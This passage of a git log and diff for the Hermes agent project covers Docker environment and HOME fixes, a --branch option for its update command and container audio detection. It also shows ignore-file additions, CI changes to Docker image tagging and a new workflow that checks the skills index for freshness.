  mounted volume (visible on the host as ~/.hermes/.hermes/skills).
* The main `hermes gateway run` process inherited HOME=/root from
  the /init context (s6-setuidgid doesn't update HOME), so
  libraries resolving XDG_STATE_HOME via $HOME tried to write to
  /root/.local/state/hermes/gateway-locks/ and failed with EACCES,
  preventing the Discord adapter from acquiring its bot-token lock.

Three surgical changes restore correct env flow:

1. The auto-generated /etc/cont-init.d/01-hermes-setup wrapper now
   uses `#!/command/with-contenv sh`, matching the pattern already
   used by docker/cont-init.d/02-reconcile-profiles. The container
   env (Dockerfile ENV + compose `environment:`) now reaches
   stage2-hook.sh and the skills_sync.py subprocess it spawns.

2. docker/main-wrapper.sh also switches to `#!/command/with-contenv
   sh`. The container CMD (`gateway run`, `chat`, `setup`, …) now
   sees HERMES_HOME and the other container-level env vars.

3. docker/main-wrapper.sh exports HOME=/opt/data before
   `s6-setuidgid hermes`. with-contenv populates HOME from the
   /init context (/root); s6-setuidgid drops privileges but does
   not update HOME. The hermes user's home per /etc/passwd is
   /opt/data, so the explicit override matches passwd.

No behavior change for the non-buggy paths: the s6-supervised
services already used with-contenv, and HOME=/opt/data only affects
processes that resolved $HOME-based paths to /root (silently
broken).
2026-05-26 13:41:21 +09:00
Stellar鱼 95cee44301 docs: add Docker audio bridge notes 2026-05-25 22:45:12 +08:00
Stellar鱼 1579a6f4a9 docs: clarify xurl auth HOME in Docker 2026-05-24 23:50:31 +08:00
Sunil123135 f8695ed6a7 feat(docker): add Windows Docker Desktop compatible compose file 2026-05-23 21:52:34 +05:30
Austin Pickett c9e5a9bb08 refactor(web): consume DS primitives, remove local component copies
Replace locally-forked UI components and hooks with their newly
promoted counterparts from @nous-research/ui:

Deleted local components (now in DS):
- components/ui/input.tsx, label.tsx, separator.tsx, card.tsx,
  confirm-dialog.tsx
- components/Toast.tsx, BottomPickSheet.tsx, NouiTypography.tsx
- hooks/useToast.ts, useModalBehavior.ts, useBelowBreakpoint.ts,
  useConfirmDelete.ts

Import updates across 25 files to use DS deep imports:
- @nous-research/ui/ui/components/{input,label,separator,card,
  confirm-dialog,toast,bottom-sheet}
- @nous-research/ui/ui/components/typography (replaces NouiTypography)
- @nous-research/ui/hooks/{use-toast,use-modal-behavior,
  use-below-breakpoint,use-confirm-delete}

Requires design-language >= feat/promote-hermes-web-primitives.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-22 21:57:59 -04:00
ilonagaja509-glitch b96a1a042f fix(docker): include anthropic, bedrock, azure-identity extras in image
Docker containers often run in isolated networks without access to PyPI.
The lazy-install mechanism fails silently in these environments, causing
ImportError when users try to use Anthropic, Bedrock, or Azure providers.

Add --extra anthropic, --extra bedrock, and --extra azure-identity to the
Dockerfile's uv sync command so these provider packages are pre-installed
in the published image.

Fixes #30394
2026-05-22 23:58:55 +08:00
emozilla d5b73937db fix(cli): plug silent-divergence holes in --branch flag
Three follow-up fixes — all the same shape: silently doing the wrong
thing instead of either honoring --branch or refusing.

1) --check --branch <missing> raised CalledProcessError from
   'git rev-list ... --count' (check=True) when the branch didn't
   exist on origin. 'git fetch origin' succeeds without a refspec
   (it just fetches what's there), so the bad-branch case wasn't
   caught at the fetch step. Now verify the compare ref with
   'git rev-parse --verify --quiet' before rev-list and emit a
   friendly error.

2) _update_via_zip (Windows fallback for broken git file I/O)
   hard-coded branch = 'main', so on the ZIP path --branch=foo
   silently downloaded main.zip and told the user it worked. Refuse
   in that case instead — silently lying about which branch got
   installed is exactly what --branch was added to prevent.

3) _cmd_update_check PyPI path returned before looking at branch,
   so PyPI users running 'hermes update --check --branch=x' got a
   generic PyPI version check with no indication --branch was
   dropped. Now prints a one-line warning when --branch was explicit
   and non-main.

Also pull the `(getattr(args, 'branch', None) or 'main').strip() or 'main'`
expression into _resolve_update_branch(args) so that all three callsites
agree on the same parsing.

Tests: 5 new tests for the --check + --branch matrix (named branch,
missing branch, default-main upstream-first, PyPI warning) and the
ZIP refusal. test_cmd_update.py is 20/20 green, broader hermes_cli/
suite (4952 tests) unchanged.
2026-05-21 02:14:08 -04:00
emozilla 51689a4206 feat(cli): add --branch flag to hermes update
`hermes update` has always hard-coded its target to `main`. Add --branch
so callers can update against a non-default channel while preserving every
existing behavior at the default:

- `hermes update`           still pulls main (no behavior change)
- `hermes update --branch X` pulls origin/X, auto-stashing and switching
                              local HEAD to X first if needed
- `hermes update --check --branch X` reports behindness against
                              origin/X (and skips the upstream/X probe,
                              since forks don't have upstream copies of
                              their own feature branches)
- Branch absent locally   → retry as `checkout -B X origin/X` (track)
- Branch absent everywhere → exit 1 with a clear error, after restoring
                              the user's prior stash so we don't strand
                              them in a weird state

The fork-upstream sync logic was already guarded on `branch == 'main'`,
so non-main updates correctly skip the upstream trampling without
further changes.

5 new tests cover: explicit --branch, default-to-main, switch-from-other,
track-from-origin, and the fail-cleanly case. Full test_cmd_update.py
suite (15 tests) passes on main.
2026-05-20 22:18:47 -04:00
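
The branch-switch fallback listed in the commit above can be sketched as a small function. This is an illustration under assumptions, not the code in hermes_cli: `switch_to_branch`, the injected `run` callable (returns True on exit status 0) and the use of `git stash pop` to restore the stash are all hypothetical. Only the `checkout -B X origin/X` retry and the exit status 1 come from the message.

```python
def switch_to_branch(branch, current, run, stashed=False):
    """Return 0 once HEAD is on `branch`, or 1 if it exists nowhere.

    `run` is a hypothetical callable that takes a git argv list and
    returns True when the command exits with status 0.
    """
    if current == branch:
        return 0
    # Branch already exists locally.
    if run(["git", "checkout", branch]):
        return 0
    # Absent locally: create (or reset) it from the remote copy.
    if run(["git", "checkout", "-B", branch, f"origin/{branch}"]):
        return 0
    # Absent everywhere: put the user's stashed work back before failing.
    if stashed:
        run(["git", "stash", "pop"])
    return 1


calls = []


def fake_run(argv):
    """Record the command and pretend every git call fails."""
    calls.append(argv)
    return False


status = switch_to_branch("nightly", "main", fake_run, stashed=True)
print(status, calls[-1])
```

Injecting `run` keeps the decision order testable without touching a real repository.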
slowtokki0409 ec641d497a chore: ignore local Hermes runtime files
Keep local Hermes Docker runtime data, NotebookLM auth/cache, and personal compose overrides out of Git and Docker build contexts. This protects tokens, OAuth state, sessions, logs, and caches while preserving the source tree.

Constraint: Only .gitignore and .dockerignore are in scope for this commit.

Tested: git diff --cached --name-only and git diff --cached --stat

Co-authored-by: OmX <omx@oh-my-codex.dev>
2026-05-20 09:57:51 +09:00
Wesley Simplicio 30dd5547ad fix(voice_mode): generalize container phrasing and use $XDG_RUNTIME_DIR 2026-05-09 15:21:12 -03:00
Wesley Simplicio bde487c911 fix(voice): honor PULSE_SERVER/PIPEWIRE_REMOTE inside Docker (#21203)
detect_audio_environment() unconditionally added a hard warning when
running inside a container, blocking `/voice on` even when the host audio
socket was correctly forwarded (PulseAudio or PipeWire) and sounddevice
could enumerate devices.

Mirror the existing WSL/PulseAudio handling: if PULSE_SERVER or
PIPEWIRE_REMOTE is set, downgrade to a notice and let the audio backend
decide. When neither is set, keep the block but extend the message with
the exact -v / -e flags users need.

Closes #21203
2026-05-09 08:55:00 -03:00
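
The downgrade rule from the commit above, sketched in isolation. `container_audio_status` and its message strings are hypothetical; the real detect_audio_environment() returns a richer structure and its exact wording is not shown here. The only behaviour taken from the message is: either variable set means notice, neither set means block.

```python
import os

# Variables named in the commit message as evidence of a forwarded socket.
FORWARDING_VARS = ("PULSE_SERVER", "PIPEWIRE_REMOTE")


def container_audio_status(env=None):
    """Return (level, message) for audio inside a container.

    level is "notice" when a host audio socket appears to be forwarded,
    and "warning" (blocking) when neither variable is set.
    """
    env = os.environ if env is None else env
    forwarded = [name for name in FORWARDING_VARS if env.get(name)]
    if forwarded:
        return "notice", "audio forwarded via " + ", ".join(forwarded)
    return "warning", "no audio socket forwarded into the container"


print(container_audio_status({"PULSE_SERVER": "unix:/run/pulse/native"}))
print(container_audio_status({}))
```

An empty string counts as unset here, which is an assumption; the commit does not say how the real check treats empty values.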
639 changed files with 46427 additions and 8448 deletions
+6
@@ -8,6 +8,10 @@ node_modules
**/node_modules
.venv
**/.venv
.notebooklm-cli-venv/
.notebooklm-playwright/
.pip-cache/
.uv-cache/
# Built artifacts that are regenerated inside the image. Excluded so local
# rebuilds on the developer's machine don't invalidate the npm-install layer
@@ -25,6 +29,8 @@ ui-tui/packages/hermes-ink/dist/
# Runtime data (bind-mounted at /opt/data; must not leak into build context)
data/
.hermes-docker/
.notebooklm-home/
# Compose/profile runtime state (bind-mounted; avoid ownership/secret issues)
hermes-config/
+7 -2
@@ -22,7 +22,12 @@ concurrency:
jobs:
deploy-vercel:
if: github.event_name == 'release'
# Triggered automatically on release publish (production cuts) and
# manually via `gh workflow run deploy-site.yml` when an out-of-band
# main commit needs to ship live before the next release tag — e.g.
# a skills-index PR that doesn't touch website/** paths and so
# doesn't auto-deploy via the deploy-docs path.
if: github.event_name == 'release' || github.event_name == 'workflow_dispatch'
runs-on: ubuntu-latest
steps:
- name: Trigger Vercel Deploy
@@ -97,4 +102,4 @@ jobs:
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@cd2ce8fcbc39b97be8ca5fce6e763baed58fa128 # v5.0.0
uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4
+48 -234
@@ -28,8 +28,7 @@ permissions:
contents: read
# Concurrency: push/release runs are NEVER cancelled so every merge gets
# its own :main or release-tagged image. :latest is guarded separately
# by the move-latest job. PR runs reuse a PR-scoped group with
# its own image. PR runs reuse a PR-scoped group with
# cancel-in-progress: true so rapid pushes to the same PR collapse to the
# latest commit.
concurrency:
@@ -72,6 +71,8 @@ jobs:
load: true
platforms: linux/amd64
tags: ${{ env.IMAGE_NAME }}:test
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
cache-from: type=gha,scope=docker-amd64
cache-to: type=gha,mode=max,scope=docker-amd64
@@ -140,12 +141,6 @@ jobs:
# Push amd64 by digest only (no tag). The merge job assembles the
# tagged manifest list. `push-by-digest=true` is docker's recommended
# pattern for multi-runner multi-platform builds.
#
# We apply the OCI revision label here (and again on arm64) because
# the move-latest job reads it off the linux/amd64 sub-manifest
# config of the floating tag to decide whether it's safe to advance.
# The label must be on each per-arch image — manifest lists themselves
# don't carry image config labels.
- name: Push amd64 by digest
id: push
if: github.event_name == 'push' && github.ref == 'refs/heads/main' || github.event_name == 'release'
@@ -156,6 +151,8 @@ jobs:
platforms: linux/amd64
labels: |
org.opencontainers.image.revision=${{ github.sha }}
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
outputs: type=image,name=${{ env.IMAGE_NAME }},push-by-digest=true,name-canonical=true,push=true
cache-from: type=gha,scope=docker-amd64
cache-to: type=gha,mode=max,scope=docker-amd64
@@ -199,10 +196,12 @@ jobs:
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
# Build once, load into the local daemon for smoke testing. Cached
# to gha with a per-arch scope; the push step below reuses every
# layer from this build.
- name: Build image (arm64, smoke test)
# Build once, load into the local daemon for smoke testing. PR arm64
# builds deliberately avoid the gha cache: cold-cache arm64 builds can
# outlive GitHub's short-lived Azure cache SAS token, then fail while
# reading or writing cache blobs before the smoke test can run.
- name: Build image (arm64, smoke test, uncached PR)
if: github.event_name == 'pull_request'
uses: docker/build-push-action@bcafcacb16a39f128d818304e6c9c0c18556b85f # v7.1.0
with:
context: .
@@ -210,6 +209,22 @@ jobs:
load: true
platforms: linux/arm64
tags: ${{ env.IMAGE_NAME }}:test
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
# Main/release builds still use the per-arch gha cache so the digest
# push below can reuse layers from this smoke-test build.
- name: Build image (arm64, smoke test, cached publish)
if: github.event_name != 'pull_request'
uses: docker/build-push-action@bcafcacb16a39f128d818304e6c9c0c18556b85f # v7.1.0
with:
context: .
file: Dockerfile
load: true
platforms: linux/arm64
tags: ${{ env.IMAGE_NAME }}:test
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
cache-from: type=gha,scope=docker-arm64
cache-to: type=gha,mode=max,scope=docker-arm64
@@ -235,6 +250,8 @@ jobs:
platforms: linux/arm64
labels: |
org.opencontainers.image.revision=${{ github.sha }}
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
outputs: type=image,name=${{ env.IMAGE_NAME }},push-by-digest=true,name-canonical=true,push=true
cache-from: type=gha,scope=docker-arm64
cache-to: type=gha,mode=max,scope=docker-arm64
@@ -258,30 +275,17 @@ jobs:
# ---------------------------------------------------------------------------
# Stitch both per-arch digests into a single tagged multi-arch manifest.
# This is a registry-side operation — no building, no layer re-push —
# so it runs in ~30 seconds. On main pushes it produces :main; on
# releases it produces :<release_tag_name>.
# so it runs in ~30 seconds.
#
# For main pushes the ancestor check runs BEFORE the manifest push so
# we never overwrite :main with an older commit. The top-level
# concurrency group (`docker-${{ github.ref }}` with
# `cancel-in-progress: false`) already serialises runs per ref; the
# ancestor check is defense-in-depth.
# On main pushes: tags both :main and :latest.
# On releases: tags :<release_tag_name>.
# ---------------------------------------------------------------------------
merge:
if: github.repository == 'NousResearch/hermes-agent' && (github.event_name == 'push' && github.ref == 'refs/heads/main' || github.event_name == 'release')
runs-on: ubuntu-latest
needs: [build-amd64, build-arm64]
timeout-minutes: 10
outputs:
pushed_release_tag: ${{ steps.mark_release_pushed.outputs.pushed }}
release_tag: ${{ steps.tag.outputs.tag }}
steps:
- name: Checkout code
if: github.event_name == 'push' && github.ref == 'refs/heads/main'
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
fetch-depth: 1000
- name: Download digests
uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
@@ -298,86 +302,7 @@ jobs:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
# Read the git revision label off the current :main manifest, then
# use `git merge-base --is-ancestor` to check whether our commit is
# a descendant of it. If :main doesn't exist yet, or its label is
# missing, we treat that as "safe to publish". If another run
# already advanced :main past us (or diverged), we skip and leave
# it alone.
- name: Decide whether to move :main
if: github.event_name == 'push' && github.ref == 'refs/heads/main'
id: main_check
run: |
set -euo pipefail
image=nousresearch/hermes-agent
image_json=$(
docker buildx imagetools inspect "${image}:main" \
--format '{{ json (index .Image "linux/amd64") }}' \
2>/dev/null || true
)
if [ -z "${image_json}" ]; then
echo "No existing :main (or inspect failed) — safe to publish."
echo "push_main=true" >> "$GITHUB_OUTPUT"
exit 0
fi
current_sha=$(
printf '%s' "${image_json}" \
| jq -r '.config.Labels."org.opencontainers.image.revision" // ""'
)
if [ -z "${current_sha}" ]; then
echo "Registry :main has no revision label — safe to publish."
echo "push_main=true" >> "$GITHUB_OUTPUT"
exit 0
fi
echo "Registry :main is at ${current_sha}"
echo "This run is at ${GITHUB_SHA}"
if [ "${current_sha}" = "${GITHUB_SHA}" ]; then
echo ":main already points at our SHA — nothing to do."
echo "push_main=false" >> "$GITHUB_OUTPUT"
exit 0
fi
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
git fetch --no-tags --prune origin \
"+refs/heads/main:refs/remotes/origin/main" \
|| true
fi
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
echo "Registry :main points at an unknown commit (${current_sha}); refusing to overwrite."
echo "push_main=false" >> "$GITHUB_OUTPUT"
exit 0
fi
if git merge-base --is-ancestor "${current_sha}" "${GITHUB_SHA}"; then
echo "Our commit is a descendant of :main — safe to advance."
echo "push_main=true" >> "$GITHUB_OUTPUT"
else
echo "Another run advanced :main past us (or diverged) — leaving it alone."
echo "push_main=false" >> "$GITHUB_OUTPUT"
fi
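
The decision table encoded by the shell gate above (the same shape is reused for :latest further down in this diff) can be written as a pure function. The names `should_advance_tag`, `commit_known` and `is_ancestor` are hypothetical; the two callables stand in for `git cat-file -e` and `git merge-base --is-ancestor`.

```python
def should_advance_tag(current_sha, our_sha, commit_known, is_ancestor):
    """Decide whether a floating tag may move to our_sha.

    current_sha is the revision label read off the registry tag, or ""
    when the tag or its label is missing.
    """
    if not current_sha:
        return True   # nothing published yet, or no label to compare against
    if current_sha == our_sha:
        return False  # tag already points at this commit
    if not commit_known(current_sha):
        return False  # unknown commit: refuse to overwrite
    # Advance only when the published commit is an ancestor of ours.
    return is_ancestor(current_sha, our_sha)


# Toy linear history, oldest first, used in place of a real repository.
history = ["a1", "b2", "c3"]


def known(sha):
    return sha in history


def ancestor(old, new):
    return history.index(old) <= history.index(new)


print(should_advance_tag("a1", "c3", known, ancestor))
print(should_advance_tag("c3", "a1", known, ancestor))
```

The second call models the backport case: the registry tag is already ahead, so it stays where it is.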
# Compute the tag for this run. Main pushes tag directly as :main
# (no per-commit SHA tags); releases use the release tag name.
- name: Compute tag
id: tag
run: |
if [ "${{ github.event_name }}" = "release" ]; then
echo "tag=${{ github.event.release.tag_name }}" >> "$GITHUB_OUTPUT"
else
echo "tag=main" >> "$GITHUB_OUTPUT"
fi
# Gate the manifest push on the ancestor check for main pushes.
# For releases there is no gate — the check doesn't even run.
- name: Create manifest list and push
if: github.event_name != 'push' || steps.main_check.outputs.push_main == 'true'
working-directory: /tmp/digests
run: |
set -euo pipefail
@@ -385,137 +310,26 @@ jobs:
for digest_file in *; do
args+=("${IMAGE_NAME}@sha256:${digest_file}")
done
docker buildx imagetools create \
-t "${IMAGE_NAME}:${TAG}" \
"${args[@]}"
if [ "${{ github.event_name }}" = "release" ]; then
TAG="${{ github.event.release.tag_name }}"
docker buildx imagetools create \
-t "${IMAGE_NAME}:${TAG}" \
"${args[@]}"
else
docker buildx imagetools create \
-t "${IMAGE_NAME}:main" \
-t "${IMAGE_NAME}:latest" \
"${args[@]}"
fi
env:
IMAGE_NAME: ${{ env.IMAGE_NAME }}
TAG: ${{ steps.tag.outputs.tag }}
- name: Inspect image
if: github.event_name != 'push' || steps.main_check.outputs.push_main == 'true'
run: |
docker buildx imagetools inspect "${IMAGE_NAME}:${TAG}"
if [ "${{ github.event_name }}" = "release" ]; then
docker buildx imagetools inspect "${IMAGE_NAME}:${{ github.event.release.tag_name }}"
else
docker buildx imagetools inspect "${IMAGE_NAME}:main"
fi
env:
IMAGE_NAME: ${{ env.IMAGE_NAME }}
TAG: ${{ steps.tag.outputs.tag }}
# Signal to move-latest that the release tag is live.
- name: Mark release tag pushed
id: mark_release_pushed
if: github.event_name == 'release'
run: echo "pushed=true" >> "$GITHUB_OUTPUT"
# ---------------------------------------------------------------------------
# Move :latest to point at the release tag the merge job pushed.
#
# :latest is the floating tag that tracks the most recent stable release.
# Only `release: published` events advance it — never main pushes.
#
# We still run an ancestor check against the existing :latest so that a
# backport release on an older branch (e.g. patching v1.1.5 after v1.2.3
# is out) doesn't drag :latest backwards. The check is the same shape
# as the ancestor check in the merge job for :main: read the OCI
# revision label off the current :latest, look up that commit in git,
# and only advance if our release commit is a strict descendant.
# ---------------------------------------------------------------------------
move-latest:
if: |
github.repository == 'NousResearch/hermes-agent'
&& github.event_name == 'release'
&& needs.merge.outputs.pushed_release_tag == 'true'
needs: merge
runs-on: ubuntu-latest
timeout-minutes: 10
concurrency:
group: docker-move-latest
cancel-in-progress: false
steps:
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
fetch-depth: 1000
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
- name: Log in to Docker Hub
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: Decide whether to move :latest
id: latest_check
run: |
set -euo pipefail
image=nousresearch/hermes-agent
image_json=$(
docker buildx imagetools inspect "${image}:latest" \
--format '{{ json (index .Image "linux/amd64") }}' \
2>/dev/null || true
)
if [ -z "${image_json}" ]; then
echo "No existing :latest (or inspect failed) — safe to publish."
echo "push_latest=true" >> "$GITHUB_OUTPUT"
exit 0
fi
current_sha=$(
printf '%s' "${image_json}" \
| jq -r '.config.Labels."org.opencontainers.image.revision" // ""'
)
if [ -z "${current_sha}" ]; then
echo "Registry :latest has no revision label — safe to publish."
echo "push_latest=true" >> "$GITHUB_OUTPUT"
exit 0
fi
echo "Registry :latest is at ${current_sha}"
echo "This release is at ${GITHUB_SHA}"
if [ "${current_sha}" = "${GITHUB_SHA}" ]; then
echo ":latest already points at our SHA — nothing to do."
echo "push_latest=false" >> "$GITHUB_OUTPUT"
exit 0
fi
# Make sure we have the :latest commit locally for merge-base.
# Releases can be cut from any branch, so fetch broadly.
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
git fetch --no-tags --prune origin \
"+refs/heads/main:refs/remotes/origin/main" \
|| true
fi
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
echo "Registry :latest points at an unknown commit (${current_sha}); refusing to overwrite."
echo "push_latest=false" >> "$GITHUB_OUTPUT"
exit 0
fi
# Our release SHA must be a descendant of the current :latest.
# Backport releases on older branches won't satisfy this and will
# be left alone — :latest stays on the newer release.
if git merge-base --is-ancestor "${current_sha}" "${GITHUB_SHA}"; then
echo "Our release commit is a descendant of :latest — safe to advance."
echo "push_latest=true" >> "$GITHUB_OUTPUT"
else
echo "Existing :latest is newer than this release (likely a backport) — leaving it alone."
echo "push_latest=false" >> "$GITHUB_OUTPUT"
fi
# Retag the already-pushed release manifest as :latest.
- name: Move :latest to this release tag
if: steps.latest_check.outputs.push_latest == 'true'
env:
RELEASE_TAG: ${{ needs.merge.outputs.release_tag }}
run: |
set -euo pipefail
image=nousresearch/hermes-agent
docker buildx imagetools create \
--tag "${image}:latest" \
"${image}:${RELEASE_TAG}"
@@ -0,0 +1,149 @@
name: Skills Index Freshness Check
# Belt-and-suspenders for the twice-daily build_skills_index pipeline.
# If the live /docs/api/skills-index.json ever goes more than 26 hours
# stale OR the file disappears entirely OR a major source has collapsed,
# this workflow opens a GitHub issue so we hear about it before users do.
#
# Triggered every 4 hours so we catch a stuck cron within one tick.
on:
schedule:
- cron: '0 */4 * * *'
workflow_dispatch:
permissions:
contents: read
issues: write
jobs:
check-freshness:
if: github.repository == 'NousResearch/hermes-agent'
runs-on: ubuntu-latest
steps:
- name: Probe live index
id: probe
run: |
set -e
URL="https://hermes-agent.nousresearch.com/docs/api/skills-index.json"
echo "Probing $URL"
# -L follows redirects; -f fails on HTTP errors; -s suppresses progress
if ! curl -fsSL -o /tmp/skills-index.json "$URL"; then
echo "status=fetch-failed" >> "$GITHUB_OUTPUT"
echo "detail=Could not download $URL" >> "$GITHUB_OUTPUT"
exit 0
fi
# Validate + extract generated_at and per-source counts
python3 <<'PY' >> "$GITHUB_OUTPUT"
import json, sys
from datetime import datetime, timezone
try:
    with open("/tmp/skills-index.json") as f:
        data = json.load(f)
except Exception as e:
    print(f"status=parse-failed")
    print(f"detail=JSON decode error: {e}")
    sys.exit(0)
generated_at = data.get("generated_at", "")
total = data.get("skill_count", 0)
skills = data.get("skills", [])
if not isinstance(skills, list):
    print("status=invalid-shape")
    print(f"detail=skills field is not a list (got {type(skills).__name__})")
    sys.exit(0)
# Per-source counts
from collections import Counter
by_src = Counter(s.get("source", "") for s in skills)
# Freshness
age_hours = None
try:
    ts = datetime.fromisoformat(generated_at.replace("Z", "+00:00"))
    age_hours = (datetime.now(timezone.utc) - ts).total_seconds() / 3600
except Exception:
    pass
# Floors — same as build_skills_index.py EXPECTED_FLOORS.
floors = {
    "skills.sh": 100,
    "lobehub": 100,
    "clawhub": 50,
    "official": 50,
    "github": 30,
    "browse-sh": 50,
}
issues = []
if age_hours is not None and age_hours > 26:
    issues.append(f"Index is {age_hours:.1f}h old (limit 26h)")
for src, floor in floors.items():
    count = by_src.get(src, 0)
    if src == "skills.sh":
        count = by_src.get("skills.sh", 0) + by_src.get("skills-sh", 0)
    if count < floor:
        issues.append(f"{src}: {count} < {floor}")
if total < 1500:
    issues.append(f"total skills: {total} < 1500")
if issues:
    detail = "; ".join(issues)
    print("status=degraded")
    # GITHUB_OUTPUT doesn't allow newlines without explicit delimiter
    print(f"detail={detail}")
else:
    print("status=ok")
    print(f"detail=Index OK — {total} skills, generated {generated_at}")
by_summary = ", ".join(f"{k}={v}" for k, v in by_src.most_common(8))
print(f"summary={by_summary}")
PY
- name: Report status
run: |
echo "Probe status: ${{ steps.probe.outputs.status }}"
echo "Detail: ${{ steps.probe.outputs.detail }}"
if [ -n "${{ steps.probe.outputs.summary }}" ]; then
echo "Summary: ${{ steps.probe.outputs.summary }}"
fi
- name: Open issue on degraded / failed probe
if: steps.probe.outputs.status != 'ok'
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
STATUS: ${{ steps.probe.outputs.status }}
DETAIL: ${{ steps.probe.outputs.detail }}
run: |
# Find existing open issue by title prefix so we don't spam — we
# append a comment instead of opening a new one each tick.
TITLE_PREFIX="[skills-index-watchdog]"
existing=$(gh issue list \
--repo "${{ github.repository }}" \
--state open \
--search "in:title \"$TITLE_PREFIX\"" \
--json number,title \
--jq '.[] | select(.title | startswith("'"$TITLE_PREFIX"'")) | .number' \
| head -1)
BODY="Automated freshness probe failed.
**Status:** \`$STATUS\`
**Detail:** $DETAIL
The Skills Hub at /docs/skills depends on \`/docs/api/skills-index.json\`.
The unified index is rebuilt by \`.github/workflows/skills-index.yml\` (cron 6/18 UTC)
and \`.github/workflows/deploy-site.yml\` (on every push affecting website/skills).
If this issue keeps reopening, check the latest runs:
- https://github.com/${{ github.repository }}/actions/workflows/skills-index.yml
- https://github.com/${{ github.repository }}/actions/workflows/deploy-site.yml
This issue was opened by \`.github/workflows/skills-index-freshness.yml\`. Close it once the underlying problem is fixed; the next probe will reopen if it's still broken."
if [ -n "$existing" ]; then
echo "Appending to existing issue #$existing"
gh issue comment "$existing" --repo "${{ github.repository }}" --body "Probe still failing at $(date -u +%FT%TZ): \`$STATUS\` — $DETAIL"
else
echo "Opening new watchdog issue"
gh issue create --repo "${{ github.repository }}" \
--title "$TITLE_PREFIX Skills index is stale or degraded ($STATUS)" \
--body "$BODY"
fi
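
The probe's checks in the workflow above are easier to exercise as a pure function with the clock passed in. This is a sketch under assumptions: `evaluate_index` and `make_index` are hypothetical names, and the floors and limits are copied from this workflow rather than from build_skills_index.py.

```python
from collections import Counter
from datetime import datetime, timezone

# Per-source floors copied from the workflow in this diff.
FLOORS = {
    "skills.sh": 100,
    "lobehub": 100,
    "clawhub": 50,
    "official": 50,
    "github": 30,
    "browse-sh": 50,
}


def evaluate_index(data, now, max_age_hours=26, min_total=1500):
    """Return (status, issues) for a parsed skills-index.json payload."""
    skills = data.get("skills", [])
    if not isinstance(skills, list):
        return "invalid-shape", [f"skills field is not a list (got {type(skills).__name__})"]

    by_src = Counter(s.get("source", "") for s in skills)
    # The workflow counts the "skills-sh" spelling toward "skills.sh".
    by_src["skills.sh"] += by_src.pop("skills-sh", 0)

    issues = []
    try:
        ts = datetime.fromisoformat(data.get("generated_at", "").replace("Z", "+00:00"))
        age_hours = (now - ts).total_seconds() / 3600
        if age_hours > max_age_hours:
            issues.append(f"Index is {age_hours:.1f}h old (limit {max_age_hours}h)")
    except (ValueError, TypeError, AttributeError):
        # As in the workflow, an unparseable timestamp skips the age check.
        pass

    for src, floor in FLOORS.items():
        if by_src[src] < floor:
            issues.append(f"{src}: {by_src[src]} < {floor}")

    total = data.get("skill_count", 0)
    if total < min_total:
        issues.append(f"total skills: {total} < {min_total}")
    return ("degraded" if issues else "ok"), issues


def make_index(generated_at):
    """Build a synthetic payload that satisfies every floor (1600 skills)."""
    counts = {"skills.sh": 900, "lobehub": 300, "clawhub": 100,
              "official": 100, "github": 100, "browse-sh": 100}
    skills = [{"source": src} for src, n in counts.items() for _ in range(n)]
    return {"generated_at": generated_at, "skill_count": len(skills), "skills": skills}


now = datetime(2026, 5, 26, 12, 0, tzinfo=timezone.utc)
fresh = evaluate_index(make_index("2026-05-26T06:00:00Z"), now)
stale = evaluate_index(make_index("2026-05-25T06:00:00Z"), now)
print(fresh)
print(stale)
```

One property carried over from the workflow: a missing or malformed generated_at does not by itself mark the index as degraded.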
+18 -1
@@ -12,6 +12,13 @@ __pycache__/
.env.production.local
.env.development
.env.test
.hermes-docker/
.notebooklm-home/
.notebooklm-cli-venv/
.notebooklm-playwright/
.pip-cache/
.uv-cache/
compose.hermes.local.yml
export*
__pycache__/model_tools.cpython-310.pyc
__pycache__/web_tools.cpython-310.pyc
@@ -71,7 +78,17 @@ mini-swe-agent/
.nix-stamps/
result
website/static/api/skills-index.json
# skills.json + skills-meta.json are build artifacts emitted by
# website/scripts/extract-skills.py during prebuild — keep them out of
# git for the same reason as skills-index.json (large, generated, change
# every build).
website/static/api/skills.json
website/static/api/skills-meta.json
models-dev-upstream/
hermes_cli/tui_dist/*
hermes_cli/scripts/
docs/superpowers/*
docs/superpowers/*
# Working directory for the Hermes Agent's session state (~/.hermes/ at runtime;
# also created in-repo when an agent operates in this checkout). Plans, audit
# logs, and per-session caches are never artifacts of the codebase.
.hermes/
+79 -12
@@ -1,4 +1,12 @@
FROM ghcr.io/astral-sh/uv:0.11.6-python3.13-trixie@sha256:b3c543b6c4f23a5f2df22866bd7857e5d304b67a564f4feab6ac22044dde719b AS uv_source
# Node 22 LTS source stage. Debian trixie's bundled nodejs is pinned to 20.x
# which reached EOL in April 2026 — we copy node + npm + corepack from the
# upstream node:22 image instead so we can stay on a supported LTS without
# waiting for Debian 14 (forky, ~mid-2027). Bookworm-based slim image used
# so the produced binary links against glibc 2.36, which runs cleanly on
# our Debian 13 (trixie, glibc 2.41) runtime. Bumping to a new Node major
# is a one-line ARG change; see #4977.
